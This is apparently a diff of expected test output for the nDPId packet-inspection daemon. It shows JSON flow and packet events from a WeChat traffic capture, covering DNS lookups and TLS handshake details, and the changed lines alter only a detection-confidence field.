{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617598,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167749276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54109,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617598,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167749276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54109,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617562,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167749276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54110,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617562,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167749276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1218,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765155,"flow_last_seen":1492167765155,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1492167765155,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1492167765155,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765155,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8EUFAAEARpLrAqAFnwKgB\/uvEADUAKLhvU\/MBAAABAAAAAAAAA3dlYgZ3ZWNoYXQDY29tAAABAAE="} -00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1218,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765155,"flow_last_seen":1492167765155,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1492167765155,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1218,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765155,"flow_last_seen":1492167765155,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1492167765155,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1492167765432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":391,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":391,"pkt_l4_len":357,"thread_ts_msec":1492167765432,"pkt":"eJKcD6iO8IQvSpdgCABFoAF5AABAAEARtB7AqAH+wKgBZwA168QBZQj\/U\/OBgAABAAMABAALA3dlYgZ3ZWNoYXQDY29tAAABAAHADAAFAAEAAAJYAAcEd2ViMcAQwCwAAQABAAACWAAEy82Tq8AsAAEAAQAAAlgABMvNl6LALAACAAEAAU8CAA0HbnMtdGVsMQJxccAXwCwAAgABAAFPAgAKB25zLWNuYzHAZ8AsAAIAAQABTwIACQZucy1vczHAZ8AsAAIAAQABTwIACgducy1jbW4xwGfAjgABAAEAAAFuAAS4ac55wI4AAQABAAABbgAEy82TmMCOAAEAAQAAAW4ABMvNsDrAjgABAAEAAAFuAARnBx7vwKMAAQABAAANPgAEtv5vZMCjAAEAAQAADT4ABLfoeDvAowABAAEAAA0+AAS2\/hBmwHgAAQABAAABmAAEb6Frw8B4AAEAAQAAAZgABG+haBHAXwABAAEAAAFuAAS2jLiMwF8AAQABAAABbgAEtwK6mQ=="} 
-00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167765155,"flow_last_seen":1492167765432,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1492167765432,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"web.wechat.com","num_queries":1,"num_answers":18,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.147.171"}} +00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167765155,"flow_last_seen":1492167765432,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1492167765432,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"web.wechat.com","num_queries":1,"num_answers":18,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.147.171"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1220,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765433,"flow_last_seen":1492167765433,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167765433,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1492167765433,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765433,"pkt":"8IQvSpdgeJKcD6iOCABFAAA88RZAAEAGKB3AqAFny82Tq+K0AbvYTb2iAAAAAKACchDtIAAAAgQFtAQCCAoAMky0AAAAAAEDAwc="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1221,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765657,"flow_last_seen":1492167765657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167765657,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58037,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1221,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1492167765657,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765657,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8ZwNAAEAGsjDAqAFny82Tq+K1Abs3CyvvAAAAAKACchAf3gAAAgQFtAQCCAoAMkzsAAAAAAEDAwc="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1222,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1492167765701,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765701,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rSlk19z2E29o6ASN8g4AQAAAgQFoAQCCApF8qRxADJMtAEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1223,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1492167765701,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167765701,"pkt":"8IQvSpdgeJKcD6iOCABFAAA08RdAAEAGKCTAqAFny82Tq+K0AbvYTb2jpZNfdIAQAOWdWQAAAQEICgAyTPdF8qRx"} 
-00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1224,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167765433,"flow_last_seen":1492167765701,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167765701,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1224,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167765433,"flow_last_seen":1492167765701,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167765701,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1225,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1492167765933,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765933,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rU+QocNNwsr8KASN8h9cwAAAgQFoAQCCApFrtG3ADJM7AEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1226,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1492167765933,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167765933,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ZwRAAEAGsjfAqAFny82Tq+K1Abs3CyvwPkKHDoAQAOXiyQAAAQEICgAyTTFFrtG3"} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1228,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167765433,"flow_last_seen":1492167765976,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167765976,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1230,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167765433,"flow_last_seen":1492167765976,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167765976,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
-00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167617248,"flow_last_seen":1492167640200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":8029,"flow_avg_l4_payload_len":308,"midstream":0,"thread_ts_msec":1492167767276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1228,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167765433,"flow_last_seen":1492167765976,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167765976,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1230,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167765433,"flow_last_seen":1492167765976,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167765976,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
+00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167617248,"flow_last_seen":1492167640200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":8029,"flow_avg_l4_payload_len":308,"midstream":0,"thread_ts_msec":1492167767276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167617498,"flow_last_seen":1492167640214,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167767276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54112,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167617498,"flow_last_seen":1492167640214,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167767276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1258,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167776953,"flow_last_seen":1492167776953,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167776953,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -356,41 +354,41 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1259,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1492167777204,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167777204,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8XvpAAEAGujnAqAFny82Tq+K3Abv08QbJAAAAAKACchB71AAAAgQFtAQCCAoAMlgzAAAAAAEDAwc="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1260,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1492167777220,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167777220,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rYX2Lh9mWvEIqASN8j8PgAAAgQFoAQCCApF00IlADJX9AEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1492167777220,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167777220,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0k9ZAAEAGhWXAqAFny82Tq+K2AbuZa8QiF9i4foAQAOVhlwAAAQEICgAyWDdF00Il"} 
-00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1264,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167776953,"flow_last_seen":1492167777221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167777221,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1264,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167776953,"flow_last_seen":1492167777221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167777221,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1265,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1492167777476,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167777476,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74reza+A99PEGyqASN8j\/yAAAAgQFoAQCCApFrtz+ADJYMwEDAwc="} 